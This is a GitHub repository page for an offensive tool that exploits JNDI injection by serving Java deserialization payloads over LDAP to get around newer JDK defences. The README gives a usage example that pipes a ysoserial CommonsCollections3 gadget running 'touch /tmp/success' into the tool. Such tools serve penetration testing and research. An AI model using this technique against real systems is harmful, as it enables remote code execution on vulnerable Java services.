Skip to content

l3yx/JNDI-Injection-LDAP-Deserialization

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
.idea
.idea
 
 
src/main/java/com/leixiao
src/main/java/com/leixiao
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
pom.xml
pom.xml
 
 

Repository files navigation

JNDI-Injection-LDAP-Deserialization

JNDI注入利用工具,LDAP+原生反序列化 方式绕过高版本JDK,需要配合ysoserial等序列化数据生成工具

Usage

java -jar JNDI-Injection-LDAP-Deserialization-1.0-SNAPSHOT.jar LDAP服务端口 Base64编码的序列化数据

Examples

java -jar JNDI-Injection-LDAP-Deserialization-1.0-SNAPSHOT.jar 1389 `java -jar  ~/Tools/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections3 'touch /tmp/success' |base64`

Building

Java 1.8 and Maven 3.x

mvn clean package -DskipTests

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

34 stars

Watchers

1 watching

Forks

10 forks
Report repository

Releases 1

JNDI-Injection-LDAP-Deserialization v1.0 Latest
Jun 9, 2023

Packages

No packages published

Languages